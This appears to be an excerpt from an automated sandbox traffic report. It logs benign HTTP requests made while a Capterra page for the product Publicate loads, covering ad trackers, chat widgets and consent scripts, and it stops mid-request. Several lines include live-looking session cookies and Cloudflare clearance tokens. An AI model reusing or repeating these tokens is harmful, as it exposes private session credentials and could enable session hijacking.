        Source: global trafficHTTP traffic detected: GET /ProductLogo/b2520648-b79c-4e03-98c1-8ad16b374420.png?auto=format%2Ccompress&fit=max&w=96&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/91f64896-759a-41ae-8d14-d540f90c5870.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/e4a33fab-dc7a-4869-b53e-a3876430e9cb.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/af2cdc9a-967d-4921-a711-ec9e1a75cf88.png?auto=format%2Ccompress&fit=max&w=32&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/d5bb525e-43fd-44ad-b018-e69dbd4d4817.jpeg?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/5152f7c6-61ed-4168-b89f-f436d97ebccd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/1a2b2816-ff47-405e-a9e2-2b8d6fd68dfd.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ProductLogo/0d820dd6-6e0b-43de-becb-e9078a2d9fac.png?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR HTTP/1.1Host: gdm-catalog-fmapi-prod.imgix.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /g/1edf9f48-375c-43f8-af0d-9773874beeb2/www.capterra.com/p/145471/Publicate/0.json?version=1.3.0 HTTP/1.1Host: seoab.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /include/1725034800000/5amzsk8w99z9.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.capterra.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /us1/v5/datadog-rum.js HTTP/1.1Host: www.datadoghq-browser-agent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /g/1edf9f48-375c-43f8-af0d-9773874beeb2/www.capterra.com/p/145471/Publicate/0.json?version=1.3.0 HTTP/1.1Host: seoab.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/otSDKStub.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937 HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /web-vitals/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/989b7b21-d05b-49b3-9b8a-3dbec459287a.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/runtime~main.72ecb88a.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://js.driftt.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2FAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/9.4a3e9801.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://js.driftt.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2FAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/main~493df0b3.8510c064.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://js.driftt.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core?d=1&embedId=5amzsk8w99z9&eId=5amzsk8w99z9&region=US&forceShow=false&skipCampaigns=false&sessionId=4a25ecd6-3ad8-40f3-82c6-efde01e22fdf&sessionStarted=1725034605.514&campaignRefreshToken=6bdf6934-57dd-427f-9a20-51ada464fb1b&hideController=false&pageLoadStartTime=1725034597937&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2FAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /faas-modal-payload.js?formId=3ob5sl3RSLbslH6LvzUKQc HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _ga=GA1.2.1968510630.1725034605; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f
        Source: global trafficHTTP traffic detected: GET /faas-modal-payload.js?formId=7DbjmVSFi4BGlfm43ATGbM HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _ga=GA1.2.1968510630.1725034605; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f
        Source: global trafficHTTP traffic detected: GET /faas-modal-payload.js?formId=6HyOcTRcBkZLAc2QGex3tl HTTP/1.1Host: forms-as-a-service.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _ga=GA1.2.1968510630.1725034605; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f
        Source: global trafficHTTP traffic detected: GET /web-vitals@4.2.3/dist/web-vitals.iife.js HTTP/1.1Host: unpkg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1Host: geolocation.onetrust.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /td/rul/1072635088?random=1725034607177&cv=11&fst=1725034607177&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
        Source: global trafficHTTP traffic detected: GET /td/fls/rul/activityi;fledge=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
        Source: global trafficHTTP traffic detected: GET /td/ga/rul?tid=G-M5DGBDHG2R&gacid=1968510630.1725034605&gtm=45je48s0v879522845z876106154za200zb76106154&dma=0&gcs=G111&gcd=13t3t3t3t5l1&npa=0&pscdl=noapi&aip=1&fledge=1&frm=0&tag_exp=0&z=1849167802 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
        Source: global trafficHTTP traffic detected: GET /activity;register_conversion=1;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F? HTTP/1.1Host: ad.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: event-source, trigger;navigation-sourceReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
        Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/1072635088/?random=1725034607177&cv=11&fst=1725034607177&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) 